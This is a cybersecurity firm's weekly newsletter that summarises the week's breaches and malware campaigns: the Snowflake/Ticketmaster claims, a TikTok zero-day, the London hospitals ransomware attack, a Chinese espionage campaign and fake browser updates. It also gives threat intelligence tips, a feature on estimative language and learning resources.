Welcome back to the Kraven Security weekly newsletter, triaging the week. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!
Top 5 News Stories
Story #1: Ticketmaster and Santander Bank Tied up on Snowflake Breach
Snowflake Inc., a cloud storage provider, is facing allegations of a data breach impacting clients like Ticketmaster and Santander Bank.
Top Takeaways:
- Hackers from the ShinyHunters group claimed to have stolen personal data from 560 million Ticketmaster customers and 30 million Santander customers.
- Hudson Rock, a research firm, initially reported that hackers breached Snowflake’s system using a Snowflake employee’s ServiceNow account with stolen credentials.
- Snowflake denied that its products were the source of the breach and stated that no vulnerability within its systems led to the data access.
- The company acknowledged that a former employee’s demo account was accessed but claimed it contained no sensitive data and that there is no pathway for customer credentials to be accessed from Snowflake’s production environment.
- Santander confirmed an incident involving customer information but assured that no transactional data or credentials were compromised.
- Live Nation, the parent company of Ticketmaster, has confirmed a data breach involving unauthorized access to a third-party cloud database believed to be Snowflake. Over 560 million Ticketmaster users’ data, including personal details and event information, may have been exposed, with data appearing on the dark web for sale.
- The situation is ongoing, with Snowflake investigating increased cyber threat activity and the veracity of ShinyHunters’ claims remaining unverified.
Story #2: TikTok Fixes Zero-Day Vulnerability Used for Account Hijacking
High-profile TikTok accounts of companies and celebrities were hijacked due to a zero-day vulnerability in the direct messages feature.
Top 4 takeaways:
- The exploit allowed attackers to gain control of accounts by having the targets open a malicious message, without needing to download anything or click links.
- TikTok’s security team has intervened to stop the attack and is working to restore access to affected accounts. The exact number of compromised accounts has not been disclosed.
- TikTok has a history of vulnerabilities, including one discovered by Microsoft in August 2022 that allowed account takeovers with a single tap.
- TikTok surpassed 1 billion users in September 2021 and has over 1 billion downloads on Google’s Play Store and 17 million ratings on the iOS App Store, making it a prime target for hackers worldwide.
Story #3: Several London Hospitals Impacted by Ransomware Attack
Synnovis, a pathology and diagnostic services provider for the NHS, was hit by a ransomware attack on June 3, impacting healthcare services at several major hospitals in London.
Top 3 takeaways:
- The attack has caused significant disruptions, particularly affecting blood transfusions, leading to cancellations and redirections of clinical activities.
- Among the impacted are King’s College Hospital, Guy’s Hospital, St Thomas’ Hospital, Royal Brompton Hospital, and Evelina London Children’s Hospital.
- Emergency care remains available, and efforts are underway to understand the full impact with support from the National Cyber Security Centre and Cyber Operations team.
Story #4: Chinese Hacking Groups Team Up to Perform Coordinated Attacks
Chinese state-sponsored hackers have been teaming up to target a Southeast Asian government agency in a cyberespionage operation dubbed the Crimson Palace campaign.
Top 4 takeaways:
- Identified as Cluster Alpha (STAC1248), Bravo (STAC1807), and Charlie (SCAT1305), each group has distinct tactics for network disruption, lateral movement, and persistent access management.
- The groups have deployed ‘EAGERBEE,’ ‘CCoreDoor,’ and ‘PocoProxy’ malware, along with techniques like DLL side-loading, living-off-the-land binaries, and a credential interception. They have also used custom malware variants during coordinated attacks.
- The existence of separate actors with parallel objectives suggests they are acting under a central authority, despite challenges in high-confidence attribution.
- The groups have targeted this agency since at least March 2023. Sophos is continuing to monitor the campaign.
Story #5: Fake Browser Updates Deliver Malware
Cybersecurity firm eSentire reports that fake web browser updates are being used to distribute BitRAT and Lumma Stealer malware.
Top Takeaways:
- The attack begins when users visit compromised websites that redirect them to a fake update page, prompting them to download a ZIP file containing the malware.
- The ZIP file includes a JavaScript file that executes PowerShell scripts to download additional payloads, including the malware, disguised as PNG image files.
- The same .NET-based loader is used to deploy both BitRAT and Lumma Stealer, suggesting it’s sold as a “malware delivery service.”
- BitRAT allows attackers to harvest data, mine cryptocurrency, and control infected hosts remotely. While Lumma Stealer, available since August 2022, captures information from web browsers, crypto wallets, and other sensitive data. It has been one of the most prevalent information stealers, with a significant increase in logs for sale from Q3 to Q4 2023.
- Attackers commonly use fake updates to infiltrate systems. Users must remain vigilant against fake updates and cybercriminals’ evolving tactics for distributing malware.
- Stay safe online by being cautious of unexpected update prompts and verifying the authenticity of any downloads.
Top Tips of the Week
Threat Intelligence
- Utilize CTI in incident response tabletop exercises. Simulate scenarios to enhance readiness and coordination.
- Regularly assess and update CTI processes. Ensure they align with the evolving threat landscape and organizational objectives.
- Consider the psychological aspect of CTI analysis. Understand threat actor motivations for more effective countermeasures.
Threat Hunting
- Conduct threat intelligence exercises. Simulate scenarios to test readiness and identify areas for improvement.
- Foster threat intelligence skills in-house. Develop a culture of continuous learning to keep your team’s skills aligned.
Custom Tooling
- Create custom tools with user-friendly interfaces. Enhance usability to encourage widespread adoption and effective utilization.
- Follow coding standards in custom tool development. Consistent coding practices enhance readability and maintainability.
Feature Article
Estimative language is a cornerstone of any good cyber threat intelligence report. It allows analysts to make clear, precise, and transparent assessments about the likelihood of an outcome or event so key stakeholders can make informed decisions. Without it, the lines between judgment and fact become blurred.
This guide will teach you what you need to start using estimative language in your threat intelligence reports and accurately assign a confidence level to your assessments. You will learn what estimative language is, its importance, and its three main components.
I will also share practical advice on using estimative language in the real world so you can begin implementing it today. Let’s jump straight in and start using estimative language!
Learning Resources
Splunk vs Datadog: Which SIEM Is Best?
Splunk and Datadog are two top-quality SIEM solutions available today. But which is better for your use case? Discover the answer in this head-to-head comparison of features, performance, and usability. Let’s begin!
Cognitive Bias in Cyber Threat Intelligence
Discover how cognitive bias can impact your work as a cyber threat intelligence analyst in this great presentation by Riana Freeman. She highlights the importance of recognizing and countering these biases to improve decision-making.
Detection Engineering with Wade Wells
Learn about detection engineering, cyber threat intelligence, and public speaking in this insightful interview between Wade Wells and Gerald Auger. The pair discuss Wade’s journey into cyber, what he would do differently, and the importance of detection engineering.
Learn How to Use OBS
If you are a remote worker, you need a good camera and microphone setup to communicate effectively with your team. This OBS masterclass will teach you how to do just that by optimizing your web camera’s image quality and showcasing various presenting techniques.
Personal Notes
🤔 This week at Kraven has been a refine and improve week. We have tracked, mapped, and recorded all our key business processes to find areas to improve or optimize. This includes everything from client onboarding to research and content creation. To deliver the most valuable possible to our clients we need to be as streamlined and efficient as possible, and to ensure this, we hold weeks like this every month or so.
We have also been focusing on expanding our repertoire of free blog articles with a new series on CTI biases and threat intelligence collection sources, so be on the lookout for those in the coming months. Please reach out if you want to see us cover other CTI topics.
